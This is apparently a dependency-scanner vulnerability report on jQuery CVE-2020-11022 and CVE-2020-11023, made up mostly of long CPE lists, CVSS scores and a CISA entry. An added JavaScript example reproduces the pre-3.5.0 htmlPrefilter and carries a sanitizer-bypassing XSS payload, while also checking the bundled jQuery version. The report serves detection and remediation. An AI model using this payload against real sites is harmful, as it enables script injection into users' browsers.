cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (including) 8.6.3 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2.0; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.7; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:* versions up to (including) 19.8 cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:* cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:* CVE-2020-11022 suppress
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References: info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; further NVD references from sources af854a3a-2127-422b-91ae-364da2661108 and security-advisories@github.com, tagged BROKEN_LINK, EXPLOIT, MAILING_LIST, MITIGATION, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY, VDB_ENTRY, VENDOR_ADVISORY
Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.2; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* versions from (including) 18.1; versions up to (including) 20.1 cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\::*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.2.2 
cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6.0.0; versions up to (including) 8.1.0.0.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to 
(including) 8.1.0 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* 
cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 
cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 CVE-2020-11023 suppress
CISA Known Exploited Vulnerability:
Product: JQuery JQuery
Name: JQuery Cross-Site Scripting (XSS) Vulnerability
Date Added: 2025-01-23
Description: JQuery contains a persistent cross-site scripting (XSS) vulnerability. When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Due Date: 2025-02-13
Notes: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2020-11023
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
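Both jQuery findings above (CVE-2020-11022 and CVE-2020-11023) make the same point: a string that an HTML sanitizer has already approved is not what jQuery before 3.5.0 actually inserts, because jQuery.htmlPrefilter rewrites the markup first. The example below is added here and is not code from this report, from OWASP Dependency-Check or from the jQuery project. It reproduces the pre-3.5.0 prefilter and the 3.5.0 identity replacement, shows a sanitizer-approved string being rewritten into one that a DOM parser treats very differently, and gates that check on the version found in a bundled jquery file using the affected ranges stated on the page. Assumptions not on the page: the LEGACY_SELF_CLOSING_TAG regex is the jQuery 3.4.x htmlPrefilter pattern as recalled from the jQuery source (confirm it against the bundle you ship); the "/*! jQuery vX.Y.Z" banner is the minified build's header; the payload and bundle text are constructed samples.

```javascript
// Added example for this report (not code from the report, from OWASP Dependency-Check
// or from the jQuery project). It shows why an HTML string that a sanitizer has already
// approved can still turn into script-executing markup when handed to .html()/.append()
// on jQuery < 3.5.0, and gates that check on the version found in a bundled jquery file.
//
// Assumptions not stated on the page: LEGACY_SELF_CLOSING_TAG is the pre-3.5.0
// jQuery.htmlPrefilter regex reproduced from the jQuery 3.4.x source as recalled here;
// the "/*! jQuery vX.Y.Z" banner is the one the minified builds carry; payload and
// bundle text below are constructed samples.

// Pre-3.5.0 jQuery.htmlPrefilter: rewrites self-closing tags such as "<div/>" into
// "<div></div>", except for the listed void elements.
const LEGACY_SELF_CLOSING_TAG =
  /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;

function legacyHtmlPrefilter(html) {
  return html.replace(LEGACY_SELF_CLOSING_TAG, "<$1></$2>");
}

// jQuery 3.5.0 (the fix version named on the page) made htmlPrefilter an identity
// function, so what the sanitizer saw is exactly what the DOM parser gets.
function patchedHtmlPrefilter(html) {
  return html;
}

// True when the legacy prefilter would change the markup, i.e. when a sanitizer's
// verdict on `html` no longer describes what jQuery < 3.5.0 actually inserts.
function prefilterChangesMarkup(html) {
  return legacyHtmlPrefilter(html) !== html;
}

// Constructed payload in the widely published shape of the proof of concept. An HTML
// parser treats the content of <style> as raw text, so a sanitizer sees one <style>
// element whose text happens to contain "<img ...>" and approves it. The legacy prefilter
// turns "<style/>" into "<style></style>"; that "</style>" closes the outer element
// early and the img, with its event handler, becomes a real element.
const SANITIZER_APPROVED = '<style><style/><img src=x onerror=alert(1)></style>';

// Affected ranges exactly as the page states them.
const AFFECTED = {
  "CVE-2020-11022": { from: "1.2", before: "3.5.0" },
  "CVE-2020-11023": { from: "1.0.3", before: "3.5.0" },
};

// Numeric dotted-version comparison; missing components count as 0.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Pull the version out of a jQuery build's banner comment (minified "/*! jQuery v3.4.1"
// or unminified "jQuery JavaScript Library v3.4.1"); null when no banner is found.
function jqueryVersionFromSource(src) {
  const m = /jQuery (?:JavaScript Library )?v(\d+\.\d+(?:\.\d+)?)/.exec(src);
  return m ? m[1] : null;
}

// CVE ids from AFFECTED whose range contains `version`.
function affectedCves(version) {
  return Object.keys(AFFECTED).filter((cve) => {
    const r = AFFECTED[cve];
    return compareVersions(version, r.from) >= 0 && compareVersions(version, r.before) < 0;
  });
}

// Constructed stand-in for the first bytes of a bundled jquery.min.js.
const SAMPLE_BUNDLE =
  "/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */\n" +
  "!function(e,t){/* ... */}(window);";

// Version gate first, then the markup check only when the bundle is in an affected range.
function report(bundleSource, sanitizedHtml) {
  const version = jqueryVersionFromSource(bundleSource);
  const cves = version ? affectedCves(version) : [];
  return {
    version,
    cves,
    markupRewritten: cves.length > 0 && prefilterChangesMarkup(sanitizedHtml),
    inserted: cves.length > 0 ? legacyHtmlPrefilter(sanitizedHtml) : patchedHtmlPrefilter(sanitizedHtml),
  };
}

console.log(JSON.stringify(report(SAMPLE_BUNDLE, SANITIZER_APPROVED), null, 2));
```

The remediation this report points at is to replace the bundled jQuery with 3.5.0 or later, after which `prefilterChangesMarkup` is moot because the prefilter is the identity. `prefilterChangesMarkup` is a detection aid for the self-closing-tag rewrite behind CVE-2020-11022 only; the `<option>` handling behind CVE-2020-11023 takes a different path inside jQuery and is not modelled here, which is one more reason the version gate, not the markup check, should decide whether a finding is closed. Overriding `jQuery.htmlPrefilter` with an identity function as a stop-gap on old versions is a workaround that has been published for these advisories; treat that as an assumption to confirm against the vendor references tagged MITIGATION above before relying on it.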
CVSSv3: Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References: info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; further NVD references from sources af854a3a-2127-422b-91ae-364da2661108 and security-advisories@github.com, tagged BROKEN_LINK, EXPLOIT, ISSUE_TRACKING, MAILING_LIST, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY, VDB_ENTRY, VENDOR_ADVISORY
THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:*
cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*
cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:cloud_insights_storage_workload_security_agent:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:hci_baseboard_management_controller:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3
cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*
cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:*
cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2
cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0
cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0
cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2
cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:*
cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*
cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0
cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.1; versions up to (including) 6.4
cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3
cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*
cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*
